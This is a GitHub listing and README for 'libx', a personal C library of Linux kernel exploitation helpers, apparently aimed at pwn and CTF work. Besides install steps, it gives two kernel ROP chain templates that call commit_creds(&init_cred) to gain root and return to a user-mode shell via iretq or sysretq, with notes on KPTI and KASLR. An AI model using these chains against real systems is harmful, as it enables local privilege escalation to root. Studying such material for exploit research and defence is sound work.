https://github.com/n132/libx
A Linux Kernel Exploitation C Library
exploitation linux-kernel pwn
Last synced: 9 months ago
- Host: GitHub
- URL: https://github.com/n132/libx
- Owner: n132
- Created: 2023-09-06T23:16:11.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2025-03-22T00:41:21.000Z (10 months ago)
- Last Synced: 2025-03-22T01:28:40.967Z (10 months ago)
- Topics: exploitation, linux-kernel, pwn
- Language: C
- Size: 647 KB
- Stars: 6
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# libx
A personal C library of helpers for Linux kernel exploits.
# Dependencies
```sh
# If you use fuse
sudo apt install fuse libfuse-dev libkeyutils-dev
```
# Usage
Install `libx`
```bash
git clone git@github.com:n132/libx.git
cd libx
make && sudo make install
```
Uninstall `libx`
```bash
make clean
make uninstall
```
# musl (optional)
Build and install the library against musl instead of glibc:
```bash
make musl && sudo make install-musl
```
# Example
```c
// gcc main.c -o ./main -lx -w
#include <libx.h>   // assumed name of the installed header; no -I is needed after `make install`

int main(void) {
    libxInit();     // set up the library (must run before any other libx helper)
    return 0;
}
```
# KROP
In kernel ROP, the chain ends by returning to user land with either `iretq` or `sysretq`. In the snippets below, `rdi`, `r11`, `rcx` and `sysret` hold the addresses of `pop rdi; ret`, `pop r11; ret`, `pop rcx; ret` and `pop rsp; swapgs; sysretq` gadgets; `init_cred`, `commit_creds` and `swapgs_restore_regs_and_return_to_usermode` are symbol addresses read from a kernel booted without KASLR, so they are rebased with `- NO_ASLR_BASE + base` (`base` being the leaked kernel text base); `user_cs`, `user_ss`, `user_rflags` and `user_sp` are saved in user mode before the bug is triggered, and `shell` is the user-mode function to land in.
## iret
```c
p[idx++] = rdi;                                   // pop rdi; ret
p[idx++] = init_cred - NO_ASLR_BASE + base;       // rdi = &init_cred
p[idx++] = commit_creds - NO_ASLR_BASE + base;    // commit_creds(&init_cred)
// Skip the register pops of the usermode-return path; +103 is build-specific.
p[idx++] = swapgs_restore_regs_and_return_to_usermode + 103 - NO_ASLR_BASE + base;
p[idx++] = *(size_t*) "USER_RDI";                 // dummy: rdi slot, popped right before iretq
p[idx++] = *(size_t*) "ORIG_RAX";                 // dummy: orig_ax slot, skipped
p[idx++] = shell;                                 // rip
p[idx++] = user_cs;                               // cs
p[idx++] = user_rflags;                           // rflags
p[idx++] = user_sp|8;                             // rsp, 8 mod 16 as if shell was reached by a call
p[idx++] = user_ss;                               // ss
```
The two dummies are 8-character literals so the 8-byte read stays inside the string. The `+103` offset jumps past the register pops to the point where the kernel copies the iret frame (rip, cs, rflags, rsp, ss) onto the trampoline stack, switches CR3 back to the user page tables and runs `swapgs; iretq`, so this path also works with KPTI enabled. The offset depends on the kernel build; check it against the disassembly of the target's `swapgs_restore_regs_and_return_to_usermode`.
## sysret
```c
p[idx++] = rdi;                                   // pop rdi; ret
p[idx++] = init_cred - NO_ASLR_BASE + base;       // rdi = &init_cred
p[idx++] = commit_creds - NO_ASLR_BASE + base;    // commit_creds(&init_cred)
p[idx++] = r11;                                   // pop r11; ret
p[idx++] = user_rflags;                           // sysretq loads rflags from r11
p[idx++] = rcx;                                   // pop rcx; ret
p[idx++] = shell;                                 // sysretq loads rip from rcx
p[idx++] = sysret;                                // pop rsp; swapgs; sysretq
p[idx++] = user_sp|8;                             // new rsp, consumed by pop rsp
```
`sysretq` takes CS and SS from `MSR_STAR`, so no segment values go on the stack. Two caveats: the raw gadget does not switch CR3, so with KPTI enabled `shell` runs under the kernel page tables, where user pages are not executable, and crashes on its first instruction (use the iret path or a gadget that restores CR3 instead); and `rcx` must be a canonical address, otherwise `sysretq` raises #GP while still in kernel mode.